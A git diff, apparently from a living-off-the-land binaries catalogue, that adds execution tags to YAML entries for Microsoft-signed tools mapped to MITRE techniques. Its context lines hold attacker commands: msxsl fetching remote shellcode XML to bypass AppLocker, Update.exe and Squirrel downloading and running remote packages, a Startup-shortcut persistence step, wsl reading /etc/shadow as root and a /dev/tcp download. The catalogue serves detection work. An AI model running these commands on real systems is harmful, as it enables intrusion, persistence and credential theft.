a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml index 9ac12c2..7ca4f43 100644 --- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index cc3754c..7cc0921 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe Description: Copy file from source to destination. Usecase: Copy file. diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 7020e0a..d87746e 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml index 81d00e3..d56eaca 100644 --- a/yml/OtherMSBinaries/OpenConsole.yml +++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 22d880c..7090e1e 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 6ea1d45..cb63fb6 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 906ca52..e495ef0 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index c17ee4a..b7c66aa 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 0055ff3..a8207ad 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --update [url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 5c3bdb5..d5d0580 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: te.exe test.dll Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index fffb4b1..622843c 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index f4049a4..1dde3d0 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -46,6 +58,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -53,6 +68,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass @@ -60,6 +78,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: CMD + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -67,6 +88,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -74,6 +98,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -81,6 +108,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: CMD - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary @@ -88,6 +117,8 @@ Commands: Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --removeShortcut=payload.exe -l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary @@ -95,6 +126,8 @@ Commands: Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index 88ccc88..1713678 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. Usecase: Proxy execution of binary with arguments @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 428d730..86d34a9 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with VS/VScode installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index d3c0b05..ed91900 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: .NetObjects Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml index 723ed34..578464c 100644 --- a/yml/OtherMSBinaries/VsLaunchBrowser.yml +++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: VSLaunchBrowser.exe .exe \\Server\Path\file Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. @@ -27,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml index 4adf4ff..36c743d 100644 --- a/yml/OtherMSBinaries/Vshadow.yml +++ b/yml/OtherMSBinaries/Vshadow.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe Detection: diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index 9c983a5..e6fb2f3 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index e66ddb8..40dd205 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: XOML Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1493d1..92970b5 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: EXE - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: CMD - Command: wsl.exe --exec bash -c "" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: CMD - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml index f0171ed..91c83a7 100644 --- a/yml/OtherMSBinaries/winfile.yml +++ b/yml/OtherMSBinaries/winfile.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\winfile.exe - Path: C:\Windows\winfile.exe